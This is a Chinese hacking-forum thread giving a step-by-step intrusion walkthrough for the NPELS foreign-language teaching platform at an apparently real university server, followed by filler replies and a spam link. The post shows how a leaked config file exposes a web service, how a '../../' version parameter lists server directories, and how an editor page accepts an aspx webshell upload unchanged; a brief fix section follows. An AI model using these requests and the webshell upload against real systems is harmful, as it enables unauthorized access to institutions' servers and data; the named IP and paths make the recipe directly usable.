查看: 3167|回复: 25

新理念外语网络教学平台文件上传及修复方案

[复制链接]
发表于 2012-11-30 04:58:54 | 显示全部楼层 |阅读模式
信息泄露和权限不严导致列目录及上传以某大学的为例:
http://www.myhack58.com /NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
        <value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作,直接 HTTP GET 列目录:

http://www.myhack58.com /NPELS/CommonService.asmx/GetTestClientFileList?version=1, 0, 0, 2187

进一步列目录(返回的网页很大,可以直接 wget 下来)

http://xxx/NPELS/CommonService.asmx/GetTestClientFileList?version=../../

发现
http:/xxx/npelsv/editor/editor.htm可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头

上传后继续列目录找到木马地址直接访问即可

OOXX


修复方案:


好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
[/td][/tr]
[/table]
发表于 2014-10-18 05:24:31 | 显示全部楼层
文笔流畅,修辞得体,深得魏晋诸朝遗风,更将唐风宋骨发扬得入木三分,能在有生之年看见楼主的这个帖子。实在是我三生之幸啊。  
发表于 2014-10-20 07:44:29 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-10-27 02:45:36 | 显示全部楼层
没人理我。。。。  
发表于 2014-11-6 13:47:08 | 显示全部楼层
小心大家盯上你哦  
发表于 2014-11-18 22:58:36 | 显示全部楼层
支持~~  
发表于 2014-12-6 17:54:07 | 显示全部楼层
应该加分  
发表于 2014-12-29 22:16:42 | 显示全部楼层
一个人最大的破产是绝望,最大的资产是希望。  
发表于 2015-1-29 22:35:44 | 显示全部楼层
天泽在线http://www.ak69v.com,升官发财  
发表于 2015-3-4 02:04:45 | 显示全部楼层
这个贴不错!!!!!看了之后就要回复贴子,呵呵  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则